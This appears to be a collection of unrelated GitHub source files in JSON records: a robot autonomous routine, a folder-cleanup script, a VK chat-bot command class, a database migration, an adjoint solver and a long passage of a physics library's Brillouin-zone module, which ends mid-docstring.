self.shot_pos = 0\n self.turning_timestamp = 0\n self.exit_timestamp = 0\n self.goal = (4159*3.6)\n self.exit_goal = -1*(4159*4)\n\n\n\n def drive(self):\n #una vuelta equivale a 4159\n #una vuelta 47.87cm\n\n if not self.has_arrived:\n if self.robot.right_drivetrain_motor.getSelectedSensorPosition() - self.inicial_state < (self.goal - 100):\n self.robot.drivetrain.drive_with_gyro_pid(self.robot.navx, .4)\n\n if self.robot.right_drivetrain_motor.getSelectedSensorPosition() - self.inicial_state > (self.goal + 100):\n self.has_arrived = True\n self.robot.drivetrain.stop()\n self.turning_timestamp = self.robot.auto_timer.getFPGATimestamp()\n self.shot_pos = self.robot.right_drivetrain_motor.getSelectedSensorPosition()\n\n\n\n elif not self.has_shot:\n if self.robot.auto_timer.getFPGATimestamp() < self.turning_timestamp + 3:\n self.robot.box_lift_motor.set(.6)\n\n elif self.robot.auto_timer.getFPGATimestamp() > self.turning_timestamp +2 and wpilib.Timer.getFPGATimestamp() < (self.turning_timestamp + 4) :\n self.robot.intake_motor.set(-.8)\n\n elif self.robot.auto_timer.getFPGATimestamp() > self.turning_timestamp + 4:\n self.robot.box_lift_motor.set(0)\n self.robot.intake_motor.set(0)\n self.has_shot = True\n self.exit_timestamp = self.robot.auto_timer.getFPGATimestamp()\n\n else:\n wpilib.SmartDashboard.putBoolean(keyName=\"has_shoot\", value=self.has_shot)\n\n if self.robot.auto_timer.getFPGATimestamp() < self.exit_timestamp + 3:\n self.robot.drivetrain.drive_with_gyro_pid(self.robot.navx, -.5)\n\n elif self.robot.auto_timer.getFPGATimestamp() > self.exit_timestamp + 3:\n 
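                # Worked numbers for the encoder constants set in __init__
                # above: 4159 ticks per wheel revolution and 47.87 cm of
                # travel per revolution, so goal = 4159 * 3.6 ~ 14972 ticks
                # ~ 3.6 rev * 47.87 cm ~ 172.3 cm forward, and
                # exit_goal = -(4159 * 4) ~ 4 rev ~ 191.5 cm backward
                # (one tick ~ 47.87 / 4159 ~ 0.0115 cm).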
self.robot.drivetrain.stop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"HORUS-Team6348/2020-robotcode","sub_path":"Autos/Station1.py","file_name":"Station1.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29179494206","text":"import os\n\nmelon = input(\"■■■■🍖 :\") + '/'\n\nos.chdir(melon)\n\nhomer = os.listdir()\n\nmw = []\nmwd = []\n\nfor home in homer:\n    mw.append(home)\n\n\nfor egg in mw:\n    if os.path.isdir(egg):\n        mwd.append(egg)\n\nfor vinte in mwd:\n    os.rmdir(vinte)\n\nprint(os.listdir())\n\n#fishingdonut\n","repo_name":"FishingDonut/delete_myfiles","sub_path":"delbeta.py","file_name":"delbeta.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71943939073","text":"from commands import commands\nclass BotCommand:\n\t\n\n\tdef __init__(self):\n\t\tself.Ksusha_cnt = 0\n\t\tpass\n\t\n\tdef __get_response(self,name_of_command:str):\n\t\tresponse = {'message': commands[name_of_command]['message'],'attachment': commands[name_of_command]['attachment']}\n\t\treturn response\n\n\tdef __is_has_trigged_word_in_command(self,command,message_):\n\t\twords = message_.split(' ')\n\t\ttriggered:bool = False \n\t\tfor word in words: \n\t\t\ttry:\n\t\t\t\tif word in commands[command]['triggers']:\n\t\t\t\t\ttriggered = True\n\t\t\t\t\tbreak\t\n\t\t\texcept KeyError:\n\t\t\t\tprint('null')\n\t\treturn triggered\n\n\n\tdef Hello(self, message_ = None):\n\t\tif message_ != None:\n\t\t\treturn self.__is_has_trigged_word_in_command('hello',message_)\n\t\telse:\n\t\t\treturn self.__get_response('hello')\n\t\t\n\tdef Bebra(self, message_ = None):\n\t\tif message_!= None:\n\t\t\treturn commands['bebra']['triggers'][0] in message_ and commands['bebra']['triggers'][1] in message_\n\t\telse:\n\t\t\treturn self.__get_response('bebra')\n\n\n\tdef Ksusha(self, message_ = None):\n\t\tif message_ != None:\n\t\t\treturn self.__is_has_trigged_word_in_command('Ksusha',message_)\n\t\telse:\n\t\t\tif self.Ksusha_cnt >= 5:\n\t\t\t\tself.Ksusha_cnt = 0\n\t\t\t\treturn self.__get_response('Ksusha')\n\t\t\telse:\n\t\t\t\tself.Ksusha_cnt += 1\n\t\t\t\treturn None\n\t\t\t\n\n\tdef Tekstilshik(self, message_ = None):\n\t\tif message_ != None:\n\t\t\treturn self.__is_has_trigged_word_in_command('Tekstilshik',message_)\n\t\telse:\n\t\t\treturn self.__get_response('Tekstilshik')\n\n\n\tdef Homework(self, message_ = None):\n\t\tif message_ != None:\n\t\t\treturn commands['homework']['triggers'][0] in message_ and (commands['homework']['triggers'][1] in message_ or commands['homework']['triggers'][2] in message_)\n\t\telse:\n\t\t\treturn self.__get_response('homework')\n\n\t\n\n\tdef We_are_Bitches(self):\n\t\treturn self.__get_response('we_are_bitches')","repo_name":"Dioneya/VkBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2395199178","text":"\"\"\"Add job output\n\nRevision ID: 77b544d0cf77\nRevises: 29dcedf5d323\nCreate Date: 2021-08-21 21:33:13.539059\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '77b544d0cf77'\ndown_revision = '29dcedf5d323'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('jobs', sa.Column('output', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('jobs', 'output')\n # ### end Alembic commands ###\n","repo_name":"OpenChemistry/distiller","sub_path":"backend/app/alembic/versions/77b544d0cf77_add_job_output.py","file_name":"77b544d0cf77_add_job_output.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33283592111","text":"'''\r\nCreated on 30.08.2018\r\n\r\n@author: Alex\r\n'''\r\n\r\nfrom functions import matM, matK\r\nfrom coefficientsANDcost import b, df, dh, dl, db, dh, ga\r\nimport numpy as np\r\nfrom scipy.sparse.linalg import spsolve\r\nfrom scipy import sparse\r\n\r\n\r\ndef adjoint(L,T,a,y,yref,yT,dx,dt,bd,alpha,delta,gamma,eta,Dy,Dz,z):\r\n \r\n \r\n #output\r\n c=[]\r\n \r\n nt=int(T/float(dt))\r\n nx=int(a/float(dx))\r\n \r\n M=matM(nx,dx,bd)\r\n K=matK(nx,dx,bd)\r\n \r\n\r\n \r\n #initialize adjoint vector\r\n p1=np.zeros([nx,nt])\r\n p2=np.zeros([nx,nt])\r\n \r\n #initialize matrix for linear equation\r\n Mk=((1/dt)*M+Dy*K)\r\n Mk2=((1/dt+delta)*M+Dz*K)\r\n Mk=sparse.csr_matrix(Mk)\r\n Mk2=sparse.csr_matrix(Mk2)\r\n\r\n \r\n p1[:,nt-1]=dh(y[:,nt-1],yT)\r\n\r\n \r\n ppre1=p1[:,nt-1]\r\n #ppre2=p2[:,nt-1]\r\n \r\n #gradient coefficients\r\n g=np.zeros([L,nx,nt])\r\n \r\n #gradient nodes\r\n gz=np.zeros([L])\r\n \r\n \r\n g[:,:,nt-1]=db(y[:,nt-1], alpha[:,:,nt-1],z,ppre1)[1]+2*ga*db(y[:,nt-1], alpha[:,:,nt-1],z, b(y[:,nt-1],alpha[:,:,nt-1],z))[1]\r\n \r\n\r\n #calculate adjoint backward in time\r\n for k in range(nt-2,-1,-1):\r\n \r\n ytk=y[:,k]\r\n \r\n #evaluate gateaux differential of control in state in direction of the adjoint\r\n #dbx=db(ytk, alpha[:,:,k],z,ppre1)\r\n \r\n \r\n phi1=spsolve(Mk,M.dot(df(ytk, ppre1)+db(ytk, alpha[:,:,k],z,ppre1)[0]+dl(k*dt, ytk, yref[:,k], alpha[:,:,k],z)+(1/dt)*ppre1))\r\n #phi2=spsolve(Mk2,M.dot(gamma*ppre1+(1/dt)*ppre2))\r\n \r\n p1[:,k]=phi1\r\n #p2[:,k]=phi2\r\n \r\n ppre1=phi1\r\n #ppre2=phi2\r\n \r\n #gradient for coefficients\r\n g[:,:,k]=db(ytk,alpha[:,:,k],z,ppre1)[1]+2*ga*db(ytk,alpha[:,:,k],z,b(ytk,alpha[:,:,k],z))[1]\r\n \r\n #gradient for nodes \r\n gz=gz+dt*db(ytk,alpha[:,:,k],z,ppre1)[2]+dt*2*ga*db(ytk,alpha[:,:,k],z,b(ytk,alpha[:,:,k],z))[2]\r\n \r\n \r\n c.append(p1)\r\n c.append(p2)\r\n c.append(g)\r\n c.append(gz)\r\n \r\n return c\r\n \r\n ","repo_name":"AVoglerTu/SFB910Feedback","sub_path":"Pythoncode/NagumoNemytskiiControl/adjCoupled.py","file_name":"adjCoupled.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4255893634","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\"\"\"Brillouin zone classes\n=========================\n\nThe Brillouin zone objects are all special classes enabling easy manipulation\nof an underlying physical quantity.\n\nQuite often a physical quantity will be required to be averaged, or calculated individually\nover a number of k-points. 
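A weighted k-point average is simply ``sum_k w_k f(k)`` with the weights
summing to 1; as a bare NumPy illustration (values invented):

>>> import numpy as np
>>> w = np.full(4, 1 / 4)                # equal k-point weights
>>> fk = np.array([1.0, 2.0, 3.0, 4.0])  # some property per k-point
>>> float((w * fk).sum())
2.5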
In this regard the Brillouin zone objects can help.\n\nThe BrillouinZone object allows direct looping of contained k-points while invoking\nparticular methods from the contained object.\nThis is best shown with an example:\n\n>>> H = Hamiltonian(...)\n>>> bz = BrillouinZone(H)\n>>> bz.apply.array.eigh()\n\nThis will calculate eigenvalues for all k-points associated with the `BrillouinZone` and\nreturn everything as an array. The `~sisl.physics.BrillouinZone.dispatch` property of\nthe `BrillouinZone` object has several use cases (here ``array`` is shown).\n\nThis may be extremely convenient when calculating band-structures:\n\n>>> H = Hamiltonian(...)\n>>> bs = BandStructure(H, [[0, 0, 0], [0.5, 0, 0]], 100)\n>>> bs_eig = bs.apply.array.eigh()\n>>> plt.plot(bs.lineark(), bs_eig)\n\nand then you have all eigenvalues for all the k-points along the path.\n\nSometimes one may want to post-process the data for each k-point.\nAs an example lets post-process the DOS on a per k-point basis while\ncalculating the average:\n \n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> E = np.linspace(-2, 2, 100)\n>>> def wrap_DOS(eigenstate):\n... # Calculate the DOS for the eigenstates\n... DOS = eigenstate.DOS(E)\n... # Calculate the velocity for the eigenstates\n... v = eigenstate.velocity()\n... V = (v ** 2).sum(1)\n... return DOS.reshape(-1, 1) * v ** 2 / V.reshape(-1, 1)\n>>> DOS = mp.apply.average.eigenstate(wrap=wrap_DOS, eta=True)\n\nThis will, calculate the Monkhorst pack k-averaged DOS split into 3 Cartesian\ndirections based on the eigenstates velocity direction. This method of manipulating\nthe result can be extremely powerful to calculate many quantities while running an\nefficient `BrillouinZone` average. The `eta` flag will print, to stdout, a progress-bar.\nThe usage of the ``wrap`` method are also passed optional arguments, ``parent`` which is\n``H`` in the above example. ``k`` and ``weight`` are the current k-point and weight of the\ncorresponding k-point. An example could be to manipulate the DOS depending on the k-point and\nweight:\n\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> E = np.linspace(-2, 2, 100)\n>>> def wrap_DOS(eigenstate, k, weight):\n... # Calculate the DOS for the eigenstates and weight by k_x and weight\n... return eigenstate.DOS(E) * k[0] * weight\n>>> DOS = mp.apply.sum.eigenstate(wrap=wrap_DOS, eta=True)\n\nWhen using wrap to calculate more than one quantity per eigenstate it may be advantageous\nto use `~sisl.oplist` to handle cases of `BrillouinZone.apply.average` and `BrillouinZone.apply.sum`.\n\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> E = np.linspace(-2, 2, 100)\n>>> def wrap_multiple(eigenstate):\n... # Calculate DOS/PDOS for eigenstates\n... DOS = eigenstate.DOS(E)\n... PDOS = eigenstate.PDOS(E)\n... # Calculate velocity for the eigenstates\n... v = eigenstate.velocity()\n... return oplist([DOS, PDOS, v])\n>>> DOS, PDOS, v = mp.apply.average.eigenstate(wrap=wrap_multiple, eta=True)\n\nWhich does mathematical operations (averaging/summing) using `~sisl.oplist`.\n\n\nParallel calculations\n---------------------\n\nThe ``apply`` method looping k-points may be explicitly parallelized.\nTo run parallel do:\n\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> with mp.apply.renew(pool=True) as par:\n... par.eigh()\n\nThis requires you also have the package ``pathos`` available.\nThe above will run in parallel using a default number of processors\nin priority:\n\n1. 
\n\nNote that this may interfere with the BLAS implementation, which defaults\nto using all CPUs for threading. The total processors/threads that will\nbe created is ``SISL_NUM_PROCS * OMP_NUM_THREADS``. Try to ensure this is below\nor equal to the actual core-count of your machine (or the number of requested\ncores in an HPC environment).\n\n\nAlternatively one can control the number of processors locally by doing:\n\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> with mp.apply.renew(pool=2) as par:\n... par.eigh()\n\nwhich will request 2 processors (regardless of core-count).\nAs a last resort you can pass your own ``Pool`` of workers that\nwill be used for the parallel processing.\n\n>>> from multiprocessing import Pool\n>>> pool = Pool(4)\n>>> H = Hamiltonian(...)\n>>> mp = MonkhorstPack(H, [10, 10, 10])\n>>> with mp.apply.renew(pool=pool) as par:\n... par.eigh()\n\nThe ``Pool`` should implement some standard methods that exist\nin the ``pathos`` environment, such as ``Pool.restart`` and ``Pool.terminate``\nand ``imap`` and ``uimap`` methods. See the ``pathos`` documentation for details.\n\n\n BrillouinZone\n MonkhorstPack\n BandStructure\n\n\"\"\"\n\nimport itertools\nfrom functools import reduce\nfrom numbers import Integral, Real\n\nimport numpy as np\nfrom numpy import argsort, dot, pi, sum\n\nimport sisl._array as _a\nfrom sisl._dispatcher import ClassDispatcher\nfrom sisl._internal import set_module\nfrom sisl.grid import Grid\nfrom sisl.lattice import Lattice\nfrom sisl.messages import SislError, deprecate_argument, info, progressbar, warn\nfrom sisl.oplist import oplist\nfrom sisl.quaternion import Quaternion\nfrom sisl.unit import units\nfrom sisl.utils import batched_indices\nfrom sisl.utils.mathematics import cart2spher, fnorm\n\n__all__ = [\"BrillouinZone\", \"MonkhorstPack\", \"BandStructure\", \"linspace_bz\"]\n\n\nclass BrillouinZoneDispatcher(ClassDispatcher):\n r\"\"\"Loop over all k-points by applying `parent` methods for all k.\n\n This allows running and collecting various computationally\n heavy methods for all k-points from a single point.\n\n The `apply` method will *dispatch* the parent methods through all k-points,\n passing `k` as an argument to the parent methods in a straight-forward manner.\n\n For instance to iterate over all eigenvalues of a Hamiltonian\n\n >>> H = Hamiltonian(...)\n >>> bz = BrillouinZone(H)\n >>> for ik, eigh in enumerate(bz.apply.eigh()):\n ...
 # do something with eigh which corresponds to bz.k[ik]\n\n By default the `apply` method exposes a set of dispatch methods:\n\n - `apply.iter`, the default iterator module\n - `apply.average` reduced result by averaging (using `BrillouinZone.weight` as the weight per k-point)\n - `apply.sum` reduced result without weighting\n - `apply.array` return a single array with all values; has `len` equal to number of k-points\n - `apply.none`, specialized method that is mainly useful when wrapping methods\n - `apply.list` same as `apply.array` but using a Python list as return value\n - `apply.oplist` using `sisl.oplist` allows greater flexibility for mathematical operations element-wise\n - `apply.datarray` if `xarray` is available one can retrieve an `xarray.DataArray` instance\n\n Please see :ref:`physics.brillouinzone` for further examples.\n \"\"\"\n pass\n\n\n@set_module(\"sisl.physics\")\ndef linspace_bz(bz, stop=None, jumps=None, jump_dk=0.05):\n r\"\"\"Convert points from a BZ object into a linear spacing of maximum value `stop`\n\n Parameters\n ----------\n bz : BrillouinZone, or ndarray\n the object containing the k-points\n stop : int or None, optional\n maximum value in the linear space, or if None, will return the cumulative\n distance of the k-points in the Brillouin zone\n jumps: array_like, optional\n indices of discontinuity jumps between the k-points whose real distance should\n not be taken into account\n jump_dk: float or array_like, optional\n fraction of the total distance that each jump point will take\n\n Returns\n -------\n numpy.ndarray\n the cumulative distances of the k-points; if `stop` is not None they are\n scaled such that the last value equals `stop`\n \"\"\"\n if isinstance(bz, BrillouinZone):\n cart = bz.tocartesian(bz.k)\n else:\n cart = bz\n # calculate vectors between neighbouring points\n dcart = np.diff(cart, axis=0, prepend=cart[0].reshape(1, -1))\n # calculate distances\n dist = (dcart**2).sum(1) ** 0.5\n\n if jumps is not None:\n # Zero out the jumps, then calculate the total distance without them\n dist[jumps] = 0.0\n total_dist = dist.sum()\n # correct jumps\n dist[jumps] = total_dist * np.asarray(jump_dk)\n\n # convert to linear scale\n if stop is None:\n return np.cumsum(dist)\n\n total_dist = dist.sum() / stop\n # Scale to total length of `stop`\n return np.cumsum(dist) / total_dist\n\n\n@set_module(\"sisl.physics\")\nclass BrillouinZone:\n \"\"\"A class to construct Brillouin zone related quantities\n\n It takes any object (which has access to cell-vectors) as an argument\n and can then return the k-points in non-reduced units from reduced units.\n\n The object associated with the BrillouinZone object *has* to implement\n at least two different properties:\n\n 1. `cell` which is the lattice vector\n 2.
 `rcell` which is the reciprocal lattice vectors.\n\n The object may also be an array of floats in which case an internal\n `Lattice` object will be created from the cell vectors (see `Lattice` for\n details).\n\n Parameters\n ----------\n parent : object or array_like\n An object with associated ``parent.cell`` and ``parent.rcell`` or\n an array of floats which may be turned into a `Lattice`\n k : array_like, optional\n k-points that this Brillouin zone represents\n weight : scalar or array_like, optional\n weights for the k-points.\n \"\"\"\n\n def __init__(self, parent, k=None, weight=None):\n self.set_parent(parent)\n # define a bz_attr as though it has not been set\n self._bz_attr = (\"\", None)\n\n # Gamma point\n if k is None:\n self._k = _a.zerosd([1, 3])\n self._w = _a.onesd(1)\n else:\n self._k = _a.arrayd(k).reshape(-1, 3)\n self._w = _a.emptyd(len(k))\n if weight is None:\n weight = 1.0 / len(self._k)\n self._w[:] = weight\n\n apply = BrillouinZoneDispatcher(\n \"apply\",\n # Do not allow class dispatching\n type_dispatcher=None,\n obj_getattr=lambda obj, key: getattr(obj.parent, key),\n )\n\n def set_parent(self, parent):\n \"\"\"Update the parent associated to this object\n\n Parameters\n ----------\n parent : object or array_like\n an object containing cell vectors\n \"\"\"\n try:\n # It probably has the supercell attached\n parent.cell\n parent.rcell\n self.parent = parent\n except Exception:\n self.parent = Lattice(parent)\n\n def __str__(self):\n \"\"\"String representation of the BrillouinZone\"\"\"\n parent = self.parent\n if isinstance(parent, Lattice):\n parent = str(parent).replace(\"\\n\", \"\\n \")\n else:\n parent = str(parent.lattice).replace(\"\\n\", \"\\n \")\n return f\"{self.__class__.__name__}{{nk: {len(self)},\\n {parent}\\n}}\"\n\n def __getstate__(self):\n \"\"\"Return dictionary with the current state\"\"\"\n return {\n \"parent_class\": self.parent.__class__,\n \"parent\": self.parent.__getstate__(),\n \"k\": self._k.copy(),\n \"weight\": self._w.copy(),\n }\n\n def __setstate__(self, state):\n \"\"\"Reset state of the object\"\"\"\n self._k = state[\"k\"]\n self._w = state[\"weight\"]\n parent = state[\"parent_class\"].__new__(state[\"parent_class\"])\n parent.__setstate__(state[\"parent\"])\n self.set_parent(parent)\n\n @staticmethod\n def merge(bzs, weight_scale=1.0, parent=None):\n \"\"\"Merge several BrillouinZone objects into one\n\n The merging strategy only stores the new list of k-points and weights.\n Information retained in the merged objects will not be stored.\n\n Parameters\n ----------\n bzs : list-like of BrillouinZone objects\n each element is a BrillouinZone object with ``bzs[i].k`` and ``bzs[i].weight``\n fields.\n weight_scale : list-like or float\n these are matched item-wise with `bzs` and applied to the corresponding weights.\n Internally ``itertools.zip_longest(fillvalue=weight_scale[-1])`` will be\n used to extend for all `bzs`.\n parent : object, optional\n Associated parent in the returned object, will default to ``bzs[0].parent``\n\n Returns\n -------\n BrillouinZone:\n even if all objects are not BrillouinZone objects the returned object\n will be.\n \"\"\"\n if isinstance(weight_scale, Real):\n weight_scale = [weight_scale]\n\n # check for lengths (scales cannot be longer!)\n if len(bzs) < len(weight_scale):\n raise ValueError(\n \"BrillouinZone.merge requires length of weight_scale to be smaller than or equal to \"\n \"the number of objects.\"\n )\n\n if parent is None:\n parent = bzs[0].parent\n\n k = []\n w = []\n for bz, scale in itertools.zip_longest(\n bzs,
 weight_scale, fillvalue=weight_scale[-1]\n ):\n k.append(bz.k)\n w.append(bz.weight * scale)\n\n return BrillouinZone(parent, np.concatenate(k), np.concatenate(w))\n\n def volume(self, ret_dim=False, periodic=None):\n \"\"\"Calculate the volume of the full Brillouin zone of the parent\n\n This will return the volume depending on the dimensions of the system.\n Here the dimensions of the system are determined by how many dimensions\n have auxiliary supercells that can contribute to Brillouin zone integrals.\n Therefore the returned value will have differing units depending on\n dimensionality.\n\n Parameters\n ----------\n ret_dim: bool, optional\n also return the dimensionality of the system\n periodic : array_like of int, optional\n estimate the volume using only the directions indexed by this array.\n The default value is `(self.parent.nsc > 1).nonzero()[0]`.\n\n Returns\n -------\n vol :\n the volume of the Brillouin zone. Units are Ang^D with D being the dimensionality.\n For 0D it will return 0.\n dimensionality : int\n the dimensionality of the volume\n \"\"\"\n # default periodic array\n if periodic is None:\n periodic = (self.parent.nsc > 1).nonzero()[0]\n\n dim = len(periodic)\n vol = 0.0\n if dim == 3:\n vol = self.parent.volume\n elif dim == 2:\n vol = self.parent.area(*periodic)\n elif dim == 1:\n vol = self.parent.length[periodic[0]]\n\n if ret_dim:\n return vol, dim\n return vol\n\n @staticmethod\n def parametrize(parent, func, N, *args, **kwargs):\n \"\"\"Generate a new `BrillouinZone` object with k-points parameterized via the function `func` in `N` separations\n\n Generates a parameterized Brillouin zone object that contains a parameterized k-point\n list.\n\n Parameters\n ----------\n parent : Lattice, or LatticeChild\n the object that the returned object will contain as parent\n func : callable\n method that parameterizes the k-points, *must* at least accept three arguments,\n 1. ``parent``: object\n 2. ``N``: total number of k-points\n 3. ``i``: current index of the k-point (starting from 0)\n\n the function must return a k-point in 3 dimensions.\n N : int or list of int\n number of k-points generated using the parameterization,\n or a list of integers that will be looped over.\n In this case arguments ``N`` and ``i`` in `func` will be\n lists accordingly.\n *args :\n additional arguments passed directly to `func`\n **kwargs :\n additional keyword arguments passed directly to `func`\n\n\n Examples\n --------\n Simple linear k-points\n\n >>> def func(sc, N, i):\n ... return [i/N, 0, 0]\n >>> bz = BrillouinZone.parametrize(1, func, 10)\n >>> assert len(bz) == 10\n >>> assert np.allclose(bz.k[-1, :], [9./10, 0, 0])\n\n For double looping, say to create your own grid\n\n >>> def func(sc, N, i):\n ...
 return [i[0]/N[0], i[1]/N[1], 0]\n >>> bz = BrillouinZone.parametrize(1, func, [10, 5])\n >>> assert len(bz) == 50\n\n \"\"\"\n if isinstance(N, Integral):\n k = np.empty([N, 3], np.float64)\n for i in range(N):\n k[i] = func(parent, N, i, *args, **kwargs)\n else:\n # N must be some kind of list-like object\n Nk = np.prod(N)\n k = np.empty([Nk, 3], np.float64)\n for i, indices in enumerate(itertools.product(*map(range, N))):\n k[i] = func(parent, N, indices, *args, **kwargs)\n return BrillouinZone(parent, k)\n\n @staticmethod\n def param_circle(parent, N_or_dk, kR, normal, origin, loop=False):\n r\"\"\"Create a parameterized k-point list where the k-points are generated on a circle around an origin\n\n The generated circle is a perfect circle in the reciprocal space (Cartesian coordinates).\n To generate a perfect circle in units of the reciprocal lattice vectors one can\n generate the circle for a diagonal supercell with side-length :math:`2\\pi`, see\n example below.\n\n Parameters\n ----------\n parent : Lattice, or LatticeChild\n the parent object\n N_or_dk : int\n number of k-points generated using the parameterization (if an integer),\n otherwise it specifies the discretization length on the circle (in 1/Ang).\n In the latter case, if fewer than 2 points would be used, the number of\n points is increased to 2 and an informational message is issued.\n kR : float\n radius of the circle in k-space. In 1/Ang\n normal : array_like of float\n normal vector to determine the circle plane\n origin : array_like of float\n origin of the circle used to generate the circular parameterization\n loop : bool, optional\n whether the first and last point are equal\n\n Examples\n --------\n\n >>> lattice = Lattice([1, 1, 10, 90, 90, 60])\n >>> bz = BrillouinZone.param_circle(lattice, 10, 0.05, [0, 0, 1], [1./3, 2./3, 0])\n\n To generate a circular set of k-points in reduced coordinates (units of the\n reciprocal lattice vectors):\n\n >>> lattice = Lattice([1, 1, 10, 90, 90, 60])\n >>> bz = BrillouinZone.param_circle(lattice, 10, 0.05, [0, 0, 1], [1./3, 2./3, 0])\n >>> bz_rec = BrillouinZone.param_circle(2*np.pi, 10, 0.05, [0, 0, 1], [1./3, 2./3, 0])\n >>> bz.k[:, :] = bz_rec.k[:, :]\n\n Returns\n -------\n BrillouinZone\n with the parameterized k-points.\n \"\"\"\n if isinstance(N_or_dk, Integral):\n N = N_or_dk\n else:\n # Calculate the required number of points\n N = int(kR**2 * pi / N_or_dk + 0.5)\n if N < 2:\n N = 2\n info(\n \"BrillouinZone.param_circle increased the number of circle points to 2.\"\n )\n\n # Conversion object\n bz = BrillouinZone(parent)\n\n normal = _a.asarrayd(normal)\n origin = _a.asarrayd(origin)\n k_n = bz.tocartesian(normal)\n k_o = bz.tocartesian(origin)\n\n # Generate a preset list of k-points on the unit-circle\n if loop:\n radians = _a.aranged(N) / (N - 1) * 2 * np.pi\n else:\n radians = _a.aranged(N) / N * 2 * np.pi\n k = _a.emptyd([N, 3])\n k[:, 0] = np.cos(radians)\n k[:, 1] = np.sin(radians)\n k[:, 2] = 0.0\n\n # Now generate the rotation\n _, theta, phi = cart2spher(k_n)\n if theta != 0:\n pv = _a.arrayd([k_n[0], k_n[1], 0])\n pv /= fnorm(pv)\n q = Quaternion(phi, pv, rad=True) * Quaternion(theta, [0, 0, 1], rad=True)\n else:\n q = Quaternion(0.0, [0, 0, k_n[2] / abs(k_n[2])], rad=True)\n\n # Calculate k-points\n k = q.rotate(k)\n k *= kR / fnorm(k).reshape(-1, 1)\n k = bz.toreduced(k + k_o)\n\n # The sum of weights is equal to the BZ area\n W = np.pi * kR**2\n w = np.repeat([W / N], N)\n\n return BrillouinZone(parent, k, w)\n\n def copy(self, parent=None):\n \"\"\"Create a copy of this object, optionally changing the parent\n\n 
Parameters\n ----------\n parent : optional\n change the parent\n \"\"\"\n if parent is None:\n parent = self.parent\n bz = self.__class__(parent, self._k, self.weight)\n bz._k = self._k.copy()\n bz._w = self._w.copy()\n return bz\n\n @property\n def k(self):\n \"\"\"A list of all k-points (if available)\"\"\"\n return self._k\n\n @property\n def weight(self):\n \"\"\"Weight of the k-points in the `BrillouinZone` object\"\"\"\n return self._w\n\n @property\n def cell(self):\n return self.parent.cell\n\n @property\n def rcell(self):\n return self.parent.rcell\n\n def tocartesian(self, k):\n \"\"\"Transfer a k-point in reduced coordinates to the Cartesian coordinates\n\n Parameters\n ----------\n k : list of float\n k-point in reduced coordinates\n\n Returns\n -------\n numpy.ndarray\n in units of 1/Ang\n \"\"\"\n return dot(k, self.rcell)\n\n def toreduced(self, k):\n \"\"\"Transfer a k-point in Cartesian coordinates to the reduced coordinates\n\n Parameters\n ----------\n k : list of float\n k-point in Cartesian coordinates\n\n Returns\n -------\n numpy.ndarray\n in units of reciprocal lattice vectors ]-0.5 ; 0.5] (if k is in the primitive cell)\n \"\"\"\n return dot(k, self.cell.T / (2 * pi))\n\n @staticmethod\n def in_primitive(k):\n \"\"\"Move the k-point into the primitive point(s) ]-0.5 ; 0.5]\n\n Parameters\n ----------\n k : array_like\n k-point(s) to move into the primitive cell\n\n Returns\n -------\n numpy.ndarray\n all k-points moved into the primitive cell\n \"\"\"\n k = _a.arrayd(k) % 1.0\n\n # Ensure that we are in the interval ]-0.5; 0.5]\n k[k > 0.5] -= 1\n\n return k\n\n def iter(self, ret_weight=False):\n \"\"\"An iterator for the k-points and (possibly) the weights\n\n Parameters\n ----------\n ret_weight : bool, optional\n if true, also yield the weight for the respective k-point\n\n Yields\n ------\n kpt : k-point\n weight : weight of k-point, only if `ret_weight` is true.\n \"\"\"\n if ret_weight:\n for i in range(len(self)):\n yield self.k[i], self.weight[i]\n else:\n yield from self.k\n\n __iter__ = iter\n\n def __len__(self):\n return len(self._k)\n\n def write(self, sile, *args, **kwargs):\n \"\"\"Writes k-points to a `~sisl.io.tableSile`.\n\n This allows one to pass a `tableSile` or a file-name.\n \"\"\"\n from sisl.io import tableSile\n\n kw = np.concatenate((self.k, self.weight.reshape(-1, 1)), axis=1)\n if isinstance(sile, tableSile):\n sile.write_data(kw.T, *args, **kwargs)\n else:\n with tableSile(sile, \"w\") as fh:\n fh.write_data(kw.T, *args, **kwargs)\n\n\n@set_module(\"sisl.physics\")\nclass MonkhorstPack(BrillouinZone):\n r\"\"\"Create a Monkhorst-Pack grid for the Brillouin zone\n\n Parameters\n ----------\n parent : object or array_like\n An object with associated `parent.cell` and `parent.rcell` or\n an array of floats which may be turned into a `Lattice`\n nkpt : array_like of ints\n a list of number of k-points along each cell direction\n displacement : float or array_like of float, optional\n the displacement of the evenly spaced grid, a single floating\n number is the displacement for the 3 directions, else they\n are the individual displacements\n size : float or array_like of float, optional\n the size of the Brillouin zone sampled. This reduces the boundaries\n of the Brillouin zone around the displacement to the fraction specified.\n I.e. `size` 